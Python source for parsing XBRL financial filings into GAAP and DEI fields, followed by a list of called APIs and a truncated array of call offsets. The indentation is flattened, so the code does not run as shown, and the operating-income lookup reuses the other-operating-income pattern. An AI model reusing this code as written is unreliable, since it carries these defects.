def parse_contexts(xbrl):
xbrl_base = xbrl.find(name=re.compile("xbrl*:*"))
if xbrl.find('xbrl') is None and xbrl_base is None:
raise XBRLException('The xbrl file is empty!')
# lookahead to see if we need a custom leading element
lookahead = xbrl.find(name=re.compile("context",
re.IGNORECASE | re.MULTILINE)).name
if ":" in lookahead:
xbrl_base = lookahead.split(":")[0] + ":"
else:
xbrl_base = ""
doc_root = ""
# we might need to attach the document root
if len(xbrl_base) > 1:
doc_root = xbrl_base
# collect all contexts up that are relevant to us
# TODO - Maybe move this to Preprocessing Ingestion
context_ids = {}
context_tags = xbrl.find_all(name=re.compile(doc_root + "context",
re.IGNORECASE | re.MULTILINE))
try:
for context_tag in context_tags:
# we don't want any segments
if context_tag.find(doc_root + "entity") is None:
continue
if context_tag.find(doc_root + "entity").find(
doc_root + "segment") is None:
context_id = context_tag.attrs['id']
found_start_date = None
found_end_date = None
if context_tag.find(doc_root + "instant"):
instant = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"instant")
.text)[:8], "%Y%m%d")
context_ids[context_id] = (instant,)
continue
if context_tag.find(doc_root + "period").find(
doc_root + "startdate"):
found_start_date = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"period")
.find(doc_root +
"startdate")
.text)[:8], "%Y%m%d")
if context_tag.find(doc_root + "period").find(doc_root +
"enddate"):
found_end_date = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"period")
.find(doc_root +
"enddate")
.text)[:8], "%Y%m%d")
if found_end_date and found_start_date:
context_ids[context_id] = (found_start_date, found_end_date)
except IndexError:
raise XBRLException('problem getting contexts')
return context_ids
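    # The resulting mapping holds 1-tuples for instant contexts and 2-tuples
    # for duration contexts, e.g. (ids and dates are made up):
    #   {"AsOf2013Q2": (datetime(2013, 6, 30),),
    #    "FY2013Q2QTD": (datetime(2013, 4, 1), datetime(2013, 6, 30))}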
@staticmethod
def parse_GAAP(xbrl,
ignore_errors,
logger):
"""
Parse GAAP from our XBRL soup
"""
gaap_data = {}
assets = xbrl.find_all("us-gaap:assets")
gaap_data["assets"] = XBRL.data_processing(assets, ignore_errors, logger)
current_assets = \
xbrl.find_all("us-gaap:assetscurrent")
gaap_data["current_assets"] = XBRL.data_processing(current_assets, ignore_errors, logger)
non_current_assets = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(assetsnoncurrent)",
re.IGNORECASE | re.MULTILINE))
        if not non_current_assets:
            # Assets = AssetsCurrent + AssetsNoncurrent, computed per context
            gaap_data["non_current_assets"] = {
                ctx: total - gaap_data["current_assets"].get(ctx, 0)
                for ctx, total in gaap_data["assets"].items()}
else:
gaap_data["non_current_assets"] = \
XBRL.data_processing(non_current_assets, ignore_errors, logger)
liabilities_and_equity = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(liabilitiesand)",
re.IGNORECASE | re.MULTILINE))
gaap_data["liabilities_and_equity"] = \
XBRL.data_processing(liabilities_and_equity, ignore_errors, logger)
liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(liabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["liabilities"] = \
XBRL.data_processing(liabilities, ignore_errors, logger)
current_liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]\
*(currentliabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["current_liabilities"] = \
XBRL.data_processing(current_liabilities, ignore_errors, logger)
noncurrent_liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]\
*(noncurrentliabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["noncurrent_liabilities"] = \
XBRL.data_processing(noncurrent_liabilities, ignore_errors, logger)
commitments_and_contingencies = \
xbrl.find_all(name=re.compile("(us-gaap:commitments\
andcontingencies)",
re.IGNORECASE | re.MULTILINE))
gaap_data["commitments_and_contingencies"] = \
XBRL.data_processing(commitments_and_contingencies, ignore_errors, logger)
redeemable_noncontrolling_interest = \
xbrl.find_all(name=re.compile("(us-gaap:redeemablenoncontrolling\
interestequity)", re.IGNORECASE | re.MULTILINE))
gaap_data["redeemable_noncontrolling_interest"] = \
XBRL.data_processing(redeemable_noncontrolling_interest, ignore_errors, logger)
temporary_equity = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(temporaryequity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["temporary_equity"] = \
XBRL.data_processing(temporary_equity, ignore_errors, logger)
equity = xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(equity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity"] = XBRL.data_processing(equity, ignore_errors, logger)
equity_attributable_interest = \
xbrl.find_all(name=re.compile("(us-gaap:minorityinterest)",
re.IGNORECASE | re.MULTILINE))
equity_attributable_interest += \
xbrl.find_all(name=re.compile("(us-gaap:partnerscapitalattributable\
tononcontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity_attributable_interest"] = \
XBRL.data_processing(equity_attributable_interest, ignore_errors, logger)
equity_attributable_parent = \
xbrl.find_all(name=re.compile("(us-gaap:liabilitiesandpartners\
capital)",
re.IGNORECASE | re.MULTILINE))
stockholders_equity = \
xbrl.find_all(name=re.compile("(us-gaap:stockholdersequity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity_attributable_parent"] = \
XBRL.data_processing(equity_attributable_parent, ignore_errors, logger)
gaap_data["stockholders_equity"] = \
XBRL.data_processing(stockholders_equity, ignore_errors, logger)
# Incomes #
revenues = xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(revenues)",
re.IGNORECASE | re.MULTILINE))
gaap_data["revenues"] = XBRL.data_processing(revenues, ignore_errors, logger)
cost_of_revenue = \
xbrl.find_all(name=re.compile("(us-gaap:costofrevenue)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofservices)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofgoodssold)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofgoodsand\
servicessold)",
re.IGNORECASE | re.MULTILINE))
gaap_data["cost_of_revenue"] = \
XBRL.data_processing(cost_of_revenue, ignore_errors, logger)
gross_profit = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(grossprofit)",
re.IGNORECASE | re.MULTILINE))
gaap_data["gross_profit"] = \
XBRL.data_processing(gross_profit, ignore_errors, logger)
operating_expenses = \
xbrl.find_all(name=re.compile("(us-gaap:operating)[^s]*(expenses)",
re.IGNORECASE | re.MULTILINE))
gaap_data["operating_expenses"] = \
XBRL.data_processing(operating_expenses, ignore_errors, logger)
costs_and_expenses = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(costsandexpenses)",
re.IGNORECASE | re.MULTILINE))
gaap_data["costs_and_expenses"] = \
XBRL.data_processing(costs_and_expenses, ignore_errors, logger)
other_operating_income = \
xbrl.find_all(name=re.compile("(us-gaap:otheroperatingincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["other_operating_income"] = \
XBRL.data_processing(other_operating_income, ignore_errors, logger)
operating_income_loss = \
xbrl.find_all(name=re.compile("(us-gaap:otheroperatingincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["operating_income_loss"] = \
XBRL.data_processing(operating_income_loss, ignore_errors, logger)
nonoperating_income_loss = \
xbrl.find_all(name=re.compile("(us-gaap:nonoperatingincomeloss)",
re.IGNORECASE | re.MULTILINE))
gaap_data["nonoperating_income_loss"] = \
XBRL.data_processing(nonoperating_income_loss, ignore_errors, logger)
interest_and_debt_expense = \
xbrl.find_all(name=re.compile("(us-gaap:interestanddebtexpense)",
re.IGNORECASE | re.MULTILINE))
gaap_data["interest_and_debt_expense"] = \
XBRL.data_processing(interest_and_debt_expense, ignore_errors, logger)
income_before_equity_investments = \
xbrl.find_all(name=re.compile("(us-gaap:incomelossfromcontinuing"
"operationsbeforeincometaxes"
"minorityinterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_before_equity_investments"] = \
XBRL.data_processing(income_before_equity_investments, ignore_errors, logger)
income_from_equity_investments = \
xbrl.find_all(name=re.compile("(us-gaap:incomelossfromequity"
"methodinvestments)", re.IGNORECASE | re.MULTILINE))
gaap_data["income_from_equity_investments"] = \
XBRL.data_processing(income_from_equity_investments, ignore_errors, logger)
income_tax_expense_benefit = \
xbrl.find_all(name=re.compile("(us-gaap:incometaxexpensebenefit)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_tax_expense_benefit"] = \
XBRL.data_processing(income_tax_expense_benefit, ignore_errors, logger)
income_continuing_operations_tax = \
xbrl.find_all(name=re.compile("(us-gaap:IncomeLossBeforeExtraordinaryItems\
AndCumulativeEffectOfChangeInAccountingPrinciple)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_continuing_operations_tax"] = \
XBRL.data_processing(income_continuing_operations_tax, ignore_errors, logger)
income_discontinued_operations = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(discontinued"
"operation)", re.IGNORECASE | re.MULTILINE))
gaap_data["income_discontinued_operations"] = \
XBRL.data_processing(income_discontinued_operations, ignore_errors, logger)
extraordary_items_gain_loss = \
xbrl.find_all(name=re.compile("(us-gaap:extraordinaryitem"
"netoftax)", re.IGNORECASE | re.MULTILINE))
gaap_data["extraordary_items_gain_loss"] = \
XBRL.data_processing(extraordary_items_gain_loss, ignore_errors, logger)
        income_loss = \
            xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(incomeloss)",
                                        re.IGNORECASE | re.MULTILINE))
        income_loss += xbrl.find_all(name=re.compile("(us-gaap:profitloss)",
                                        re.IGNORECASE | re.MULTILINE))
        gaap_data["income_loss"] = \
            XBRL.data_processing(income_loss, ignore_errors, logger)
net_income_shareholders = \
xbrl.find_all(name=re.compile("(us-gaap:netincomeavailabletocommon\
stockholdersbasic)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_shareholders"] = \
XBRL.data_processing(net_income_shareholders, ignore_errors, logger)
preferred_stock_dividends = \
xbrl.find_all(name=re.compile("(us-gaap:preferredstockdividendsand\
otheradjustments)", re.IGNORECASE | re.MULTILINE))
gaap_data["preferred_stock_dividends"] = \
XBRL.data_processing(preferred_stock_dividends, ignore_errors, logger)
net_income_loss_noncontrolling = \
xbrl.find_all(name=re.compile("(us-gaap:netincomelossattributableto\
noncontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_loss_noncontrolling"] = \
XBRL.data_processing(net_income_loss_noncontrolling, ignore_errors, logger)
net_income_loss = \
xbrl.find_all(name=re.compile("^us-gaap:netincomeloss$",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_income_loss"] = \
XBRL.data_processing(net_income_loss, ignore_errors, logger)
other_comprehensive_income = \
xbrl.find_all(name=re.compile("(us-gaap:othercomprehensiveincomeloss\
netoftax)", re.IGNORECASE | re.MULTILINE))
gaap_data["other_comprehensive_income"] = \
XBRL.data_processing(other_comprehensive_income, ignore_errors, logger)
comprehensive_income = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income"] = \
XBRL.data_processing(comprehensive_income, ignore_errors, logger)
comprehensive_income_parent = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincomenetof"
"tax)", re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income_parent"] = \
XBRL.data_processing(comprehensive_income_parent, ignore_errors, logger)
comprehensive_income_interest = \
xbrl.find_all(name=re.compile("(us-gaap:comprehensiveincomenetoftax\
attributabletononcontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["comprehensive_income_interest"] = \
XBRL.data_processing(comprehensive_income_interest, ignore_errors, logger)
# Cash flow statements #
net_cash_flows_operating = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
operatingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_operating"] = \
XBRL.data_processing(net_cash_flows_operating, ignore_errors, logger)
net_cash_flows_investing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
investingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing"] = \
XBRL.data_processing(net_cash_flows_investing, ignore_errors, logger)
net_cash_flows_financing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
financingactivities)", re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_financing"] = \
XBRL.data_processing(net_cash_flows_financing, ignore_errors, logger)
net_cash_flows_operating_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
operatingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_operating_continuing"] = \
XBRL.data_processing(net_cash_flows_operating_continuing, ignore_errors, logger)
net_cash_flows_investing_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
investingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing_continuing"] = \
XBRL.data_processing(net_cash_flows_investing_continuing, ignore_errors, logger)
net_cash_flows_financing_continuing = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
financingactivitiescontinuingoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_financing_continuing"] = \
XBRL.data_processing(net_cash_flows_financing_continuing, ignore_errors, logger)
net_cash_flows_operating_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:cashprovidedbyusedin\
operatingactivitiesdiscontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_operating_discontinued"] = \
XBRL.data_processing(net_cash_flows_operating_discontinued, ignore_errors, logger)
net_cash_flows_investing_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:cashprovidedbyusedin\
investingactivitiesdiscontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_investing_discontinued"] = \
XBRL.data_processing(net_cash_flows_investing_discontinued, ignore_errors, logger)
net_cash_flows_discontinued = \
xbrl.find_all(name=re.compile("(us-gaap:netcashprovidedbyusedin\
discontinuedoperations)",
re.IGNORECASE | re.MULTILINE))
gaap_data["net_cash_flows_discontinued"] = \
XBRL.data_processing(net_cash_flows_discontinued, ignore_errors, logger)
common_shares_outstanding = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
outstanding)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_outstanding"] = \
XBRL.data_processing(common_shares_outstanding, ignore_errors, logger)
common_shares_issued = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
issued)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_issued"] = \
XBRL.data_processing(common_shares_issued, ignore_errors, logger)
common_shares_authorized = \
xbrl.find_all(name=re.compile("(us-gaap:commonstockshares\
authorized)",
re.IGNORECASE | re.MULTILINE))
gaap_data["common_shares_authorized"] = \
XBRL.data_processing(common_shares_authorized, ignore_errors, logger)
return gaap_data
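    # Note that every gaap_data entry above is a {context_id: value} dict
    # produced by data_processing below; callers still need a matching
    # context id (see the duration-matching lookup earlier in this class)
    # to reduce each concept to a single number.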
@staticmethod
def parse_DEI(xbrl,
ignore_errors,
logger):
"""
Parse DEI from our XBRL soup and return a DEI object.
"""
dei_obj = DEI()
trading_symbol = xbrl.find_all(name=re.compile("(dei:tradingsymbol)",
re.IGNORECASE | re.MULTILINE))
dei_obj.trading_symbol = \
XBRL.data_processing(trading_symbol,
ignore_errors, logger,
options={'type': 'String',
'no_context': True})
company_name = xbrl.find_all(name=re.compile("(dei:entityregistrantname)",
re.IGNORECASE | re.MULTILINE))
dei_obj.company_name = \
XBRL.data_processing(company_name,
ignore_errors, logger,
options={'type': 'String',
'no_context': True})
shares_outstanding = xbrl.find_all(name=re.compile("(dei:entitycommonstocksharesoutstanding)",
re.IGNORECASE | re.MULTILINE))
dei_obj.shares_outstanding = \
XBRL.data_processing(shares_outstanding,
ignore_errors, logger,
options={'type': 'Number',
'no_context': True})
public_float = xbrl.find_all(name=re.compile("(dei:entitypublicfloat)",
re.IGNORECASE | re.MULTILINE))
dei_obj.public_float = \
XBRL.data_processing(public_float,
ignore_errors, logger,
options={'type': 'Number',
'no_context': True})
return dei_obj
@staticmethod
def parse_custom(xbrl,
ignore_errors,
logger):
"""
Parse company custom entities from XBRL and return an Custom object.
"""
custom_obj = Custom()
custom_data = xbrl.find_all(re.compile('^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\s*',
re.IGNORECASE | re.MULTILINE))
elements = {}
for data in custom_data:
if XBRL.is_number(data.text):
setattr(custom_obj, data.name.split(':')[1], data.text)
return custom_obj
@staticmethod
def is_number(s):
"""
Test if value is numeric
"""
try:
s = float(s)
return True
except ValueError:
return False
@staticmethod
def data_processing(elements,
ignore_errors,
logger,
**kwargs):
"""
Process a XBRL tag object and extract the correct value as
stated by the context.
"""
options = kwargs.get('options', {'type': 'Number',
'no_context': False})
if options['type'] == 'String':
if len(elements) > 0:
return elements[0].text
        if options['no_context']:
if len(elements) > 0 and XBRL.is_number(elements[0].text):
return elements[0].text
data = {}
for element in elements:
try:
ctx = element.attrs['contextref']
if XBRL.is_number(element.text):
attr_precision = 0
                    decimals = element.attrs.get('decimals')
if decimals is not None:
attr_precision = int(decimals)
val = float(element.text) if attr_precision > 0 else int(element.text)
data[ctx] = val
except Exception as e:
if ignore_errors == 0:
raise XBRLException('value extraction error')
elif ignore_errors == 2:
logger.error(str(e) + " error at " +
''.join(element.text))
return data
# Preprocessing to fix broken XML
# TODO - Run tests to see if other XML processing errors can occur
class XBRLPreprocessedFile(XBRLFile):
def __init__(self, fh):
super(XBRLPreprocessedFile, self).__init__(fh)
if self.fh is None:
return
xbrl_string = self.fh.read()
# find all closing tags as hints
closing_tags = [t.upper() for t in re.findall(r'(?i)</([a-z0-9_\.]+)>',
xbrl_string)]
# close all tags that don't have closing tags and
# leave all other data intact
last_open_tag = None
tokens = re.split(r'(?i)(</?[a-z0-9_\.]+>)', xbrl_string)
new_fh = StringIO()
for idx, token in enumerate(tokens):
is_closing_tag = token.startswith('</')
is_processing_tag = token.startswith('<?')
is_cdata = token.startswith('<!')
is_tag = token.startswith('<') and not is_cdata
is_open_tag = is_tag and not is_closing_tag \
and not is_processing_tag
if is_tag:
if last_open_tag is not None:
new_fh.write("</%s>" % last_open_tag)
last_open_tag = None
if is_open_tag:
                tag_name = re.findall(r'(?i)<([a-z0-9_\.]+)>', token)[0]
if tag_name.upper() not in closing_tags:
last_open_tag = tag_name
new_fh.write(token)
new_fh.seek(0)
self.fh = new_fh
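# A minimal illustration of the repair above (tag names are made up): in the
# fragment "<dei:DocumentType>10-Q<dei:DocumentPeriodEndDate>...", DocumentType
# never closes anywhere in the file, so "</dei:DocumentType>" is emitted as
# soon as the next tag token is encountered.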
# Base GAAP object
@dataclass
class GAAP:
assets : float = 0.0
current_assets : float = 0.0
non_current_assets : float = 0.0
liabilities_and_equity : float = 0.0
liabilities : float = 0.0
current_liabilities : float = 0.0
noncurrent_liabilities : float = 0.0
commitments_and_contingencies : float = 0.0
redeemable_noncontrolling_interest : float = 0.0
temporary_equity : float = 0.0
equity : float = 0.0
equity_attributable_interest : float = 0.0
equity_attributable_parent : float = 0.0
stockholders_equity : float = 0.0
revenues : float = 0.0
cost_of_revenue : float = 0.0
    gross_profit : float = 0.0
    operating_expenses : float = 0.0
costs_and_expenses : float = 0.0
other_operating_income : float = 0.0
operating_income_loss : float = 0.0
nonoperating_income_loss : float = 0.0
interest_and_debt_expense : float = 0.0
income_before_equity_investments : float = 0.0
income_from_equity_investments : float = 0.0
income_tax_expense_benefit : float = 0.0
extraordary_items_gain_loss : float = 0.0
income_loss : float = 0.0
net_income_shareholders : float = 0.0
preferred_stock_dividends : float = 0.0
net_income_loss_noncontrolling : float = 0.0
net_income_parent : float = 0.0
net_income_loss : float = 0.0
other_comprehensive_income : float = 0.0
comprehensive_income : float = 0.0
comprehensive_income_parent : float = 0.0
comprehensive_income_interest : float = 0.0
net_cash_flows_operating : float = 0.0
net_cash_flows_investing : float = 0.0
net_cash_flows_financing : float = 0.0
net_cash_flows_operating_continuing : float = 0.0
net_cash_flows_investing_continuing : float = 0.0
net_cash_flows_financing_continuing : float = 0.0
net_cash_flows_operating_discontinued : float = 0.0
net_cash_flows_investing_discontinued : float = 0.0
net_cash_flows_discontinued : float = 0.0
common_shares_outstanding : float = 0.0
common_shares_issued : float = 0.0
common_shares_authorized : float = 0.0
class GAAPSerializer(Schema):
assets = fields.Number()
current_assets = fields.Number()
non_current_assets = fields.Number()
liabilities_and_equity = fields.Number()
liabilities = fields.Number()
current_liabilities = fields.Number()
noncurrent_liabilities = fields.Number()
commitments_and_contingencies = fields.Number()
redeemable_noncontrolling_interest = fields.Number()
temporary_equity = fields.Number()
equity = fields.Number()
equity_attributable_interest = fields.Number()
equity_attributable_parent = fields.Number()
stockholders_equity = fields.Number()
revenues = fields.Number()
cost_of_revenue = fields.Number()
gross_profit = fields.Number()
operating_expenses = fields.Number()
costs_and_expenses = fields.Number()
other_operating_income = fields.Number()
operating_income_loss = fields.Number()
nonoperating_income_loss = fields.Number()
interest_and_debt_expense = fields.Number()
income_before_equity_investments = fields.Number()
income_from_equity_investments = fields.Number()
income_tax_expense_benefit = fields.Number()
extraordary_items_gain_loss = fields.Number()
income_loss = fields.Number()
net_income_shareholders = fields.Number()
preferred_stock_dividends = fields.Number()
net_income_loss_noncontrolling = fields.Number()
net_income_parent = fields.Number()
net_income_loss = fields.Number()
other_comprehensive_income = fields.Number()
comprehensive_income = fields.Number()
comprehensive_income_parent = fields.Number()
comprehensive_income_interest = fields.Number()
net_cash_flows_operating = fields.Number()
net_cash_flows_investing = fields.Number()
net_cash_flows_financing = fields.Number()
net_cash_flows_operating_continuing = fields.Number()
net_cash_flows_investing_continuing = fields.Number()
net_cash_flows_financing_continuing = fields.Number()
net_cash_flows_operating_discontinued = fields.Number()
net_cash_flows_investing_discontinued = fields.Number()
net_cash_flows_discontinued = fields.Number()
common_shares_outstanding = fields.Number()
common_shares_issued = fields.Number()
common_shares_authorized = fields.Number()
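# Usage sketch: GAAPSerializer().dump(gaap_obj) returns a plain dict on
# marshmallow 3.x; on marshmallow 2.x the result is wrapped, so use
# GAAPSerializer().dump(gaap_obj).data instead.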
# Base DEI object
@dataclass
class DEI:
trading_symbol : str = ''
company_name : str = ''
shares_outstanding : float = 0.0
public_float: float = 0.0
class DEISerializer(Schema):
trading_symbol = fields.String()
company_name = fields.String()
shares_outstanding = fields.Number()
public_float = fields.Number()
# Base Custom object
class Custom:
def __init__(self):
        pass
def __call__(self):
return self.__dict__.items()
|
[
"io.StringIO",
"re.split",
"logging.basicConfig",
"BeautifulSoup.BeautifulStoneSoup",
"datetime.date.today",
"bs4.BeautifulSoup",
"datetime.datetime.strptime",
"re.findall",
"datetime.timedelta",
"marshmallow.fields.String",
"marshmallow.fields.Number",
"collections.OrderedDict",
"logging.getLogger",
"re.compile"
] |
[((33597, 33612), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33610, 33612), False, 'from marshmallow import Schema, fields\n'), ((33634, 33649), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33647, 33649), False, 'from marshmallow import Schema, fields\n'), ((33675, 33690), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33688, 33690), False, 'from marshmallow import Schema, fields\n'), ((33720, 33735), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33733, 33735), False, 'from marshmallow import Schema, fields\n'), ((33754, 33769), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33767, 33769), False, 'from marshmallow import Schema, fields\n'), ((33796, 33811), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33809, 33811), False, 'from marshmallow import Schema, fields\n'), ((33841, 33856), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33854, 33856), False, 'from marshmallow import Schema, fields\n'), ((33893, 33908), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33906, 33908), False, 'from marshmallow import Schema, fields\n'), ((33950, 33965), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (33963, 33965), False, 'from marshmallow import Schema, fields\n'), ((33989, 34004), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34002, 34004), False, 'from marshmallow import Schema, fields\n'), ((34018, 34033), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34031, 34033), False, 'from marshmallow import Schema, fields\n'), ((34069, 34084), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34082, 34084), False, 'from marshmallow import Schema, fields\n'), ((34118, 34133), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34131, 34133), False, 'from marshmallow import Schema, fields\n'), ((34160, 34175), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34173, 34175), False, 'from marshmallow import Schema, fields\n'), ((34191, 34206), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34204, 34206), False, 'from marshmallow import Schema, fields\n'), ((34229, 34244), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34242, 34244), False, 'from marshmallow import Schema, fields\n'), ((34264, 34279), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34277, 34279), False, 'from marshmallow import Schema, fields\n'), ((34305, 34320), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34318, 34320), False, 'from marshmallow import Schema, fields\n'), ((34346, 34361), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34359, 34361), False, 'from marshmallow import Schema, fields\n'), ((34391, 34406), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34404, 34406), False, 'from marshmallow import Schema, fields\n'), ((34435, 34450), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34448, 34450), False, 'from marshmallow import Schema, fields\n'), ((34482, 34497), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34495, 34497), False, 'from marshmallow import Schema, fields\n'), ((34530, 34545), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34543, 34545), False, 'from marshmallow import Schema, fields\n'), ((34585, 34600), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34598, 34600), False, 'from marshmallow 
import Schema, fields\n'), ((34638, 34653), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34651, 34653), False, 'from marshmallow import Schema, fields\n'), ((34687, 34702), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34700, 34702), False, 'from marshmallow import Schema, fields\n'), ((34737, 34752), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34750, 34752), False, 'from marshmallow import Schema, fields\n'), ((34771, 34786), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34784, 34786), False, 'from marshmallow import Schema, fields\n'), ((34817, 34832), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34830, 34832), False, 'from marshmallow import Schema, fields\n'), ((34865, 34880), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34878, 34880), False, 'from marshmallow import Schema, fields\n'), ((34918, 34933), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34931, 34933), False, 'from marshmallow import Schema, fields\n'), ((34958, 34973), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (34971, 34973), False, 'from marshmallow import Schema, fields\n'), ((34996, 35011), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35009, 35011), False, 'from marshmallow import Schema, fields\n'), ((35045, 35060), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35058, 35060), False, 'from marshmallow import Schema, fields\n'), ((35088, 35103), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35101, 35103), False, 'from marshmallow import Schema, fields\n'), ((35138, 35153), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35151, 35153), False, 'from marshmallow import Schema, fields\n'), ((35190, 35205), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35203, 35205), False, 'from marshmallow import Schema, fields\n'), ((35237, 35252), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35250, 35252), False, 'from marshmallow import Schema, fields\n'), ((35284, 35299), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35297, 35299), False, 'from marshmallow import Schema, fields\n'), ((35331, 35346), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35344, 35346), False, 'from marshmallow import Schema, fields\n'), ((35389, 35404), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35402, 35404), False, 'from marshmallow import Schema, fields\n'), ((35447, 35462), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35460, 35462), False, 'from marshmallow import Schema, fields\n'), ((35505, 35520), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35518, 35520), False, 'from marshmallow import Schema, fields\n'), ((35565, 35580), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35578, 35580), False, 'from marshmallow import Schema, fields\n'), ((35625, 35640), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35638, 35640), False, 'from marshmallow import Schema, fields\n'), ((35675, 35690), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35688, 35690), False, 'from marshmallow import Schema, fields\n'), ((35723, 35738), 